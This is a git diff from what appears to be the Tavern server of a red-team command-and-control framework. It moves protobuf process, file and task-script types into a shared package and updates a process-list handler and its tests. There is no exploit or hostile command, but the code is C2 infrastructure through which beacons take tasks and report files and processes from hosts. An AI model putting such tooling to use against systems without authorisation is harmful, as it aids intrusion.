b/tavern/internal/c2/api_report_process_list.go @@ -15,7 +15,7 @@ func (srv *Server) ReportProcessList(ctx context.Context, req *c2pb.ReportProces if req.TaskId == 0 { return nil, status.Errorf(codes.InvalidArgument, "must provide task id") } - if len(req.List) < 1 { + if req.List == nil || len(req.List.List) < 1 { return nil, status.Errorf(codes.InvalidArgument, "must provide process list") } @@ -50,8 +50,8 @@ func (srv *Server) ReportProcessList(ctx context.Context, req *c2pb.ReportProces }() // Create Processes - builders := make([]*ent.HostProcessCreate, 0, len(req.List)) - for _, proc := range req.List { + builders := make([]*ent.HostProcessCreate, 0, len(req.List.List)) + for _, proc := range req.List.List { builders = append(builders, txGraph.HostProcess.Create(). SetHostID(host.ID). diff --git a/tavern/internal/c2/api_report_process_list_test.go b/tavern/internal/c2/api_report_process_list_test.go index 5f15e2053..bb68d6da7 100644 --- a/tavern/internal/c2/api_report_process_list_test.go +++ b/tavern/internal/c2/api_report_process_list_test.go @@ -12,6 +12,7 @@ import ( "google.golang.org/protobuf/testing/protocmp" "realm.pub/tavern/internal/c2/c2pb" "realm.pub/tavern/internal/c2/c2test" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent" ) @@ -44,10 +45,12 @@ func TestReportProcessList(t *testing.T) { task: existingTask, req: &c2pb.ReportProcessListRequest{ TaskId: int64(existingTask.ID), - List: []*c2pb.Process{ - {Pid: 1, Name: "systemd", Principal: "root"}, - {Pid: 2321, Name: "/bin/sh", Principal: "root"}, - {Pid: 4505, Name: "/usr/bin/sshd", Principal: "root"}, + List: &epb.ProcessList{ + List: []*epb.Process{ + {Pid: 1, Name: "systemd", Principal: "root"}, + {Pid: 2321, Name: "/bin/sh", Principal: "root"}, + {Pid: 4505, Name: "/usr/bin/sshd", Principal: "root"}, + }, }, }, wantResp: &c2pb.ReportProcessListResponse{}, @@ -61,10 +64,12 @@ func TestReportProcessList(t *testing.T) { task: existingTask, req: &c2pb.ReportProcessListRequest{ TaskId: int64(existingTask.ID), - List: []*c2pb.Process{ - {Pid: 1, Name: "systemd", Principal: "root"}, - {Pid: 4505, Name: "/usr/bin/sshd", Principal: "root"}, - {Pid: 4809, Name: "/usr/bin/nginx", Principal: "root"}, + List: &epb.ProcessList{ + List: []*epb.Process{ + {Pid: 1, Name: "systemd", Principal: "root"}, + {Pid: 4505, Name: "/usr/bin/sshd", Principal: "root"}, + {Pid: 4809, Name: "/usr/bin/nginx", Principal: "root"}, + }, }, }, wantResp: &c2pb.ReportProcessListResponse{}, @@ -77,8 +82,10 @@ func TestReportProcessList(t *testing.T) { host: existingHost, task: existingTask, req: &c2pb.ReportProcessListRequest{ - List: []*c2pb.Process{ - {Pid: 1, Name: "systemd", Principal: "root"}, + List: &epb.ProcessList{ + List: []*epb.Process{ + {Pid: 1, Name: "systemd", Principal: "root"}, + }, }, }, wantResp: nil, @@ -90,7 +97,9 @@ func TestReportProcessList(t *testing.T) { task: existingTask, req: &c2pb.ReportProcessListRequest{ TaskId: int64(existingTask.ID), - List: []*c2pb.Process{}, + List: &epb.ProcessList{ + List: []*epb.Process{}, + }, }, wantResp: nil, wantCode: codes.InvalidArgument, @@ -99,8 +108,10 @@ func TestReportProcessList(t *testing.T) { name: "Not_Found", req: &c2pb.ReportProcessListRequest{ TaskId: 99888777776666, - List: []*c2pb.Process{ - {Pid: 1, Name: "systemd", Principal: "root"}, + List: &epb.ProcessList{ + List: []*epb.Process{ + {Pid: 1, Name: "systemd", Principal: "root"}, + }, }, }, wantResp: nil, diff --git a/tavern/internal/c2/c2pb/c2.pb.go b/tavern/internal/c2/c2pb/c2.pb.go index 179a732a8..5d5ef8004 100644 --- a/tavern/internal/c2/c2pb/c2.pb.go +++ b/tavern/internal/c2/c2pb/c2.pb.go @@ -10,6 +10,7 @@ import ( timestamp "github.com/golang/protobuf/ptypes/timestamp" protoreflect "google.golang.org/protobuf/reflect/protoreflect" protoimpl "google.golang.org/protobuf/runtime/protoimpl" + epb "realm.pub/tavern/internal/c2/epb" reflect "reflect" sync "sync" ) @@ -76,88 +77,6 @@ func (Host_Platform) EnumDescriptor() ([]byte, []int) { return file_c2_proto_rawDescGZIP(), []int{2, 0} } -type Process_Status int32 - -const ( - Process_STATUS_UNSPECIFIED Process_Status = 0 - Process_STATUS_UNKNOWN Process_Status = 1 - Process_STATUS_IDLE Process_Status = 2 - Process_STATUS_RUN Process_Status = 3 - Process_STATUS_SLEEP Process_Status = 4 - Process_STATUS_STOP Process_Status = 5 - Process_STATUS_ZOMBIE Process_Status = 6 - Process_STATUS_TRACING Process_Status = 7 - Process_STATUS_DEAD Process_Status = 8 - Process_STATUS_WAKE_KILL Process_Status = 9 - Process_STATUS_WAKING Process_Status = 10 - Process_STATUS_PARKED Process_Status = 11 - Process_STATUS_LOCK_BLOCKED Process_Status = 12 - Process_STATUS_UNINTERUPTIBLE_DISK_SLEEP Process_Status = 13 -) - -// Enum value maps for Process_Status. -var ( - Process_Status_name = map[int32]string{ - 0: "STATUS_UNSPECIFIED", - 1: "STATUS_UNKNOWN", - 2: "STATUS_IDLE", - 3: "STATUS_RUN", - 4: "STATUS_SLEEP", - 5: "STATUS_STOP", - 6: "STATUS_ZOMBIE", - 7: "STATUS_TRACING", - 8: "STATUS_DEAD", - 9: "STATUS_WAKE_KILL", - 10: "STATUS_WAKING", - 11: "STATUS_PARKED", - 12: "STATUS_LOCK_BLOCKED", - 13: "STATUS_UNINTERUPTIBLE_DISK_SLEEP", - } - Process_Status_value = map[string]int32{ - "STATUS_UNSPECIFIED": 0, - "STATUS_UNKNOWN": 1, - "STATUS_IDLE": 2, - "STATUS_RUN": 3, - "STATUS_SLEEP": 4, - "STATUS_STOP": 5, - "STATUS_ZOMBIE": 6, - "STATUS_TRACING": 7, - "STATUS_DEAD": 8, - "STATUS_WAKE_KILL": 9, - "STATUS_WAKING": 10, - "STATUS_PARKED": 11, - "STATUS_LOCK_BLOCKED": 12, - "STATUS_UNINTERUPTIBLE_DISK_SLEEP": 13, - } -) - -func (x Process_Status) Enum() *Process_Status { - p := new(Process_Status) - *p = x - return p -} - -func (x Process_Status) String() string { - return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x)) -} - -func (Process_Status) Descriptor() protoreflect.EnumDescriptor { - return file_c2_proto_enumTypes[1].Descriptor() -} - -func (Process_Status) Type() protoreflect.EnumType { - return &file_c2_proto_enumTypes[1] -} - -func (x Process_Status) Number() protoreflect.EnumNumber { - return protoreflect.EnumNumber(x) -} - -// Deprecated: Use Process_Status.Descriptor instead. -func (Process_Status) EnumDescriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{3, 0} -} - // Agent information to identify the type of beacon. type Agent struct { state protoimpl.MessageState @@ -358,135 +277,21 @@ func (x *Host) GetPrimaryIp() string { return "" } -// Process running on the host system. -type Process struct { - state protoimpl.MessageState - sizeCache protoimpl.SizeCache - unknownFields protoimpl.UnknownFields - - Pid uint64 `protobuf:"varint,1,opt,name=pid,proto3" json:"pid,omitempty"` - Ppid uint64 `protobuf:"varint,2,opt,name=ppid,proto3" json:"ppid,omitempty"` - Name string `protobuf:"bytes,3,opt,name=name,proto3" json:"name,omitempty"` - Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"` - Path string `protobuf:"bytes,5,opt,name=path,proto3" json:"path,omitempty"` - Cmd string `protobuf:"bytes,6,opt,name=cmd,proto3" json:"cmd,omitempty"` - Env string `protobuf:"bytes,7,opt,name=env,proto3" json:"env,omitempty"` - Cwd string `protobuf:"bytes,8,opt,name=cwd,proto3" json:"cwd,omitempty"` - Status Process_Status `protobuf:"varint,9,opt,name=status,proto3,enum=c2.Process_Status" json:"status,omitempty"` -} - -func (x *Process) Reset() { - *x = Process{} - if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[3] - ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) - ms.StoreMessageInfo(mi) - } -} - -func (x *Process) String() string { - return protoimpl.X.MessageStringOf(x) -} - -func (*Process) ProtoMessage() {} - -func (x *Process) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[3] - if protoimpl.UnsafeEnabled && x != nil { - ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) - if ms.LoadMessageInfo() == nil { - ms.StoreMessageInfo(mi) - } - return ms - } - return mi.MessageOf(x) -} - -// Deprecated: Use Process.ProtoReflect.Descriptor instead. -func (*Process) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{3} -} - -func (x *Process) GetPid() uint64 { - if x != nil { - return x.Pid - } - return 0 -} - -func (x *Process) GetPpid() uint64 { - if x != nil { - return x.Ppid - } - return 0 -} - -func (x *Process) GetName() string { - if x != nil { - return x.Name - } - return "" -} - -func (x *Process) GetPrincipal() string { - if x != nil { - return x.Principal - } - return "" -} - -func (x *Process) GetPath() string { - if x != nil { - return x.Path - } - return "" -} - -func (x *Process) GetCmd() string { - if x != nil { - return x.Cmd - } - return "" -} - -func (x *Process) GetEnv() string { - if x != nil { - return x.Env - } - return "" -} - -func (x *Process) GetCwd() string { - if x != nil { - return x.Cwd - } - return "" -} - -func (x *Process) GetStatus() Process_Status { - if x != nil { - return x.Status - } - return Process_STATUS_UNSPECIFIED -} - // Task instructions for the beacon to execute. type Task struct { state protoimpl.MessageState sizeCache protoimpl.SizeCache unknownFields protoimpl.UnknownFields - Id int64 `protobuf:"varint,1,opt,name=id,proto3" json:"id,omitempty"` - Eldritch string `protobuf:"bytes,2,opt,name=eldritch,proto3" json:"eldritch,omitempty"` - Parameters map[string]string `protobuf:"bytes,3,rep,name=parameters,proto3" json:"parameters,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` - FileNames []string `protobuf:"bytes,4,rep,name=file_names,json=fileNames,proto3" json:"file_names,omitempty"` - QuestName string `protobuf:"bytes,5,opt,name=quest_name,json=questName,proto3" json:"quest_name,omitempty"` + Id int64 `protobuf:"varint,1,opt,name=id,proto3" json:"id,omitempty"` + Tome *epb.Tome `protobuf:"bytes,2,opt,name=tome,proto3" json:"tome,omitempty"` + QuestName string `protobuf:"bytes,3,opt,name=quest_name,json=questName,proto3" json:"quest_name,omitempty"` } func (x *Task) Reset() { *x = Task{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[4] + mi := &file_c2_proto_msgTypes[3] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -499,7 +304,7 @@ func (x *Task) String() string { func (*Task) ProtoMessage() {} func (x *Task) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[4] + mi := &file_c2_proto_msgTypes[3] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -512,7 +317,7 @@ func (x *Task) ProtoReflect() protoreflect.Message { // Deprecated: Use Task.ProtoReflect.Descriptor instead. func (*Task) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{4} + return file_c2_proto_rawDescGZIP(), []int{3} } func (x *Task) GetId() int64 { @@ -522,23 +327,9 @@ func (x *Task) GetId() int64 { return 0 } -func (x *Task) GetEldritch() string { - if x != nil { - return x.Eldritch - } - return "" -} - -func (x *Task) GetParameters() map[string]string { - if x != nil { - return x.Parameters - } - return nil -} - -func (x *Task) GetFileNames() []string { +func (x *Task) GetTome() *epb.Tome { if x != nil { - return x.FileNames + return x.Tome } return nil } @@ -562,7 +353,7 @@ type TaskError struct { func (x *TaskError) Reset() { *x = TaskError{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[5] + mi := &file_c2_proto_msgTypes[4] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -575,7 +366,7 @@ func (x *TaskError) String() string { func (*TaskError) ProtoMessage() {} func (x *TaskError) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[5] + mi := &file_c2_proto_msgTypes[4] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -588,7 +379,7 @@ func (x *TaskError) ProtoReflect() protoreflect.Message { // Deprecated: Use TaskError.ProtoReflect.Descriptor instead. func (*TaskError) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{5} + return file_c2_proto_rawDescGZIP(), []int{4} } func (x *TaskError) GetMsg() string { @@ -616,7 +407,7 @@ type TaskOutput struct { func (x *TaskOutput) Reset() { *x = TaskOutput{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[6] + mi := &file_c2_proto_msgTypes[5] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -629,7 +420,7 @@ func (x *TaskOutput) String() string { func (*TaskOutput) ProtoMessage() {} func (x *TaskOutput) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[6] + mi := &file_c2_proto_msgTypes[5] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -642,7 +433,7 @@ func (x *TaskOutput) ProtoReflect() protoreflect.Message { // Deprecated: Use TaskOutput.ProtoReflect.Descriptor instead. func (*TaskOutput) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{6} + return file_c2_proto_rawDescGZIP(), []int{5} } func (x *TaskOutput) GetId() int64 { @@ -692,7 +483,7 @@ type ClaimTasksRequest struct { func (x *ClaimTasksRequest) Reset() { *x = ClaimTasksRequest{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[7] + mi := &file_c2_proto_msgTypes[6] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -705,7 +496,7 @@ func (x *ClaimTasksRequest) String() string { func (*ClaimTasksRequest) ProtoMessage() {} func (x *ClaimTasksRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[7] + mi := &file_c2_proto_msgTypes[6] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -718,7 +509,7 @@ func (x *ClaimTasksRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ClaimTasksRequest.ProtoReflect.Descriptor instead. func (*ClaimTasksRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{7} + return file_c2_proto_rawDescGZIP(), []int{6} } func (x *ClaimTasksRequest) GetBeacon() *Beacon { @@ -739,7 +530,7 @@ type ClaimTasksResponse struct { func (x *ClaimTasksResponse) Reset() { *x = ClaimTasksResponse{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[8] + mi := &file_c2_proto_msgTypes[7] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -752,7 +543,7 @@ func (x *ClaimTasksResponse) String() string { func (*ClaimTasksResponse) ProtoMessage() {} func (x *ClaimTasksResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[8] + mi := &file_c2_proto_msgTypes[7] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -765,7 +556,7 @@ func (x *ClaimTasksResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ClaimTasksResponse.ProtoReflect.Descriptor instead. func (*ClaimTasksResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{8} + return file_c2_proto_rawDescGZIP(), []int{7} } func (x *ClaimTasksResponse) GetTasks() []*Task { @@ -786,7 +577,7 @@ type DownloadFileRequest struct { func (x *DownloadFileRequest) Reset() { *x = DownloadFileRequest{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[9] + mi := &file_c2_proto_msgTypes[8] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -799,7 +590,7 @@ func (x *DownloadFileRequest) String() string { func (*DownloadFileRequest) ProtoMessage() {} func (x *DownloadFileRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[9] + mi := &file_c2_proto_msgTypes[8] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -812,7 +603,7 @@ func (x *DownloadFileRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use DownloadFileRequest.ProtoReflect.Descriptor instead. func (*DownloadFileRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{9} + return file_c2_proto_rawDescGZIP(), []int{8} } func (x *DownloadFileRequest) GetName() string { @@ -833,7 +624,7 @@ type DownloadFileResponse struct { func (x *DownloadFileResponse) Reset() { *x = DownloadFileResponse{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[10] + mi := &file_c2_proto_msgTypes[9] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -846,7 +637,7 @@ func (x *DownloadFileResponse) String() string { func (*DownloadFileResponse) ProtoMessage() {} func (x *DownloadFileResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[10] + mi := &file_c2_proto_msgTypes[9] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -859,7 +650,7 @@ func (x *DownloadFileResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use DownloadFileResponse.ProtoReflect.Descriptor instead. func (*DownloadFileResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{10} + return file_c2_proto_rawDescGZIP(), []int{9} } func (x *DownloadFileResponse) GetChunk() []byte { @@ -874,20 +665,14 @@ type ReportFileRequest struct { sizeCache protoimpl.SizeCache unknownFields protoimpl.UnknownFields - TaskId int64 `protobuf:"varint,1,opt,name=task_id,json=taskId,proto3" json:"task_id,omitempty"` - Path string `protobuf:"bytes,2,opt,name=path,proto3" json:"path,omitempty"` - Owner string `protobuf:"bytes,3,opt,name=owner,proto3" json:"owner,omitempty"` - Group string `protobuf:"bytes,4,opt,name=group,proto3" json:"group,omitempty"` - Permissions string `protobuf:"bytes,5,opt,name=permissions,proto3" json:"permissions,omitempty"` - Size int64 `protobuf:"varint,6,opt,name=size,proto3" json:"size,omitempty"` - Sha3_256Hash string `protobuf:"bytes,7,opt,name=sha3_256_hash,json=sha3256Hash,proto3" json:"sha3_256_hash,omitempty"` - Chunk []byte `protobuf:"bytes,8,opt,name=chunk,proto3" json:"chunk,omitempty"` + TaskId int64 `protobuf:"varint,1,opt,name=task_id,json=taskId,proto3" json:"task_id,omitempty"` + Chunk *epb.File `protobuf:"bytes,2,opt,name=chunk,proto3" json:"chunk,omitempty"` } func (x *ReportFileRequest) Reset() { *x = ReportFileRequest{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[11] + mi := &file_c2_proto_msgTypes[10] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -900,7 +685,7 @@ func (x *ReportFileRequest) String() string { func (*ReportFileRequest) ProtoMessage() {} func (x *ReportFileRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[11] + mi := &file_c2_proto_msgTypes[10] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -913,7 +698,7 @@ func (x *ReportFileRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportFileRequest.ProtoReflect.Descriptor instead. func (*ReportFileRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{11} + return file_c2_proto_rawDescGZIP(), []int{10} } func (x *ReportFileRequest) GetTaskId() int64 { @@ -923,49 +708,7 @@ func (x *ReportFileRequest) GetTaskId() int64 { return 0 } -func (x *ReportFileRequest) GetPath() string { - if x != nil { - return x.Path - } - return "" -} - -func (x *ReportFileRequest) GetOwner() string { - if x != nil { - return x.Owner - } - return "" -} - -func (x *ReportFileRequest) GetGroup() string { - if x != nil { - return x.Group - } - return "" -} - -func (x *ReportFileRequest) GetPermissions() string { - if x != nil { - return x.Permissions - } - return "" -} - -func (x *ReportFileRequest) GetSize() int64 { - if x != nil { - return x.Size - } - return 0 -} - -func (x *ReportFileRequest) GetSha3_256Hash() string { - if x != nil { - return x.Sha3_256Hash - } - return "" -} - -func (x *ReportFileRequest) GetChunk() []byte { +func (x *ReportFileRequest) GetChunk() *epb.File { if x != nil { return x.Chunk } @@ -981,7 +724,7 @@ type ReportFileResponse struct { func (x *ReportFileResponse) Reset() { *x = ReportFileResponse{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[12] + mi := &file_c2_proto_msgTypes[11] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -994,7 +737,7 @@ func (x *ReportFileResponse) String() string { func (*ReportFileResponse) ProtoMessage() {} func (x *ReportFileResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[12] + mi := &file_c2_proto_msgTypes[11] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1007,7 +750,7 @@ func (x *ReportFileResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportFileResponse.ProtoReflect.Descriptor instead. func (*ReportFileResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{12} + return file_c2_proto_rawDescGZIP(), []int{11} } type ReportProcessListRequest struct { @@ -1015,14 +758,14 @@ type ReportProcessListRequest struct { sizeCache protoimpl.SizeCache unknownFields protoimpl.UnknownFields - List []*Process `protobuf:"bytes,1,rep,name=list,proto3" json:"list,omitempty"` - TaskId int64 `protobuf:"varint,2,opt,name=task_id,json=taskId,proto3" json:"task_id,omitempty"` + TaskId int64 `protobuf:"varint,1,opt,name=task_id,json=taskId,proto3" json:"task_id,omitempty"` + List *epb.ProcessList `protobuf:"bytes,2,opt,name=list,proto3" json:"list,omitempty"` } func (x *ReportProcessListRequest) Reset() { *x = ReportProcessListRequest{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[13] + mi := &file_c2_proto_msgTypes[12] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1035,7 +778,7 @@ func (x *ReportProcessListRequest) String() string { func (*ReportProcessListRequest) ProtoMessage() {} func (x *ReportProcessListRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[13] + mi := &file_c2_proto_msgTypes[12] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1048,21 +791,21 @@ func (x *ReportProcessListRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportProcessListRequest.ProtoReflect.Descriptor instead. func (*ReportProcessListRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{13} + return file_c2_proto_rawDescGZIP(), []int{12} } -func (x *ReportProcessListRequest) GetList() []*Process { +func (x *ReportProcessListRequest) GetTaskId() int64 { if x != nil { - return x.List + return x.TaskId } - return nil + return 0 } -func (x *ReportProcessListRequest) GetTaskId() int64 { +func (x *ReportProcessListRequest) GetList() *epb.ProcessList { if x != nil { - return x.TaskId + return x.List } - return 0 + return nil } type ReportProcessListResponse struct { @@ -1074,7 +817,7 @@ type ReportProcessListResponse struct { func (x *ReportProcessListResponse) Reset() { *x = ReportProcessListResponse{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[14] + mi := &file_c2_proto_msgTypes[13] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1087,7 +830,7 @@ func (x *ReportProcessListResponse) String() string { func (*ReportProcessListResponse) ProtoMessage() {} func (x *ReportProcessListResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[14] + mi := &file_c2_proto_msgTypes[13] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1100,7 +843,7 @@ func (x *ReportProcessListResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportProcessListResponse.ProtoReflect.Descriptor instead. func (*ReportProcessListResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{14} + return file_c2_proto_rawDescGZIP(), []int{13} } type ReportTaskOutputRequest struct { @@ -1114,7 +857,7 @@ type ReportTaskOutputRequest struct { func (x *ReportTaskOutputRequest) Reset() { *x = ReportTaskOutputRequest{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[15] + mi := &file_c2_proto_msgTypes[14] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1127,7 +870,7 @@ func (x *ReportTaskOutputRequest) String() string { func (*ReportTaskOutputRequest) ProtoMessage() {} func (x *ReportTaskOutputRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[15] + mi := &file_c2_proto_msgTypes[14] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1140,7 +883,7 @@ func (x *ReportTaskOutputRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportTaskOutputRequest.ProtoReflect.Descriptor instead. func (*ReportTaskOutputRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{15} + return file_c2_proto_rawDescGZIP(), []int{14} } func (x *ReportTaskOutputRequest) GetOutput() *TaskOutput { @@ -1159,7 +902,7 @@ type ReportTaskOutputResponse struct { func (x *ReportTaskOutputResponse) Reset() { *x = ReportTaskOutputResponse{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[16] + mi := &file_c2_proto_msgTypes[15] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1172,7 +915,7 @@ func (x *ReportTaskOutputResponse) String() string { func (*ReportTaskOutputResponse) ProtoMessage() {} func (x *ReportTaskOutputResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[16] + mi := &file_c2_proto_msgTypes[15] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1185,7 +928,7 @@ func (x *ReportTaskOutputResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportTaskOutputResponse.ProtoReflect.Descriptor instead. func (*ReportTaskOutputResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{16} + return file_c2_proto_rawDescGZIP(), []int{15} } var File_c2_proto protoreflect.FileDescriptor @@ -1193,7 +936,8 @@ var File_c2_proto protoreflect.FileDescriptor var file_c2_proto_rawDesc = []byte{ 0x0a, 0x08, 0x63, 0x32, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x02, 0x63, 0x32, 0x1a, 0x1f, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, - 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, + 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x1a, + 0x0e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, 0x27, 0x0a, 0x05, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x22, 0xa1, 0x01, 0x0a, 0x06, 0x42, 0x65, 0x61, @@ -1222,138 +966,88 @@ var file_c2_proto_rawDesc = []byte{ 0x53, 0x10, 0x01, 0x12, 0x12, 0x0a, 0x0e, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4c, 0x49, 0x4e, 0x55, 0x58, 0x10, 0x02, 0x12, 0x12, 0x0a, 0x0e, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4d, 0x41, 0x43, 0x4f, 0x53, 0x10, 0x03, 0x12, 0x10, 0x0a, 0x0c, 0x50, - 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x42, 0x53, 0x44, 0x10, 0x04, 0x22, 0x85, 0x04, - 0x0a, 0x07, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 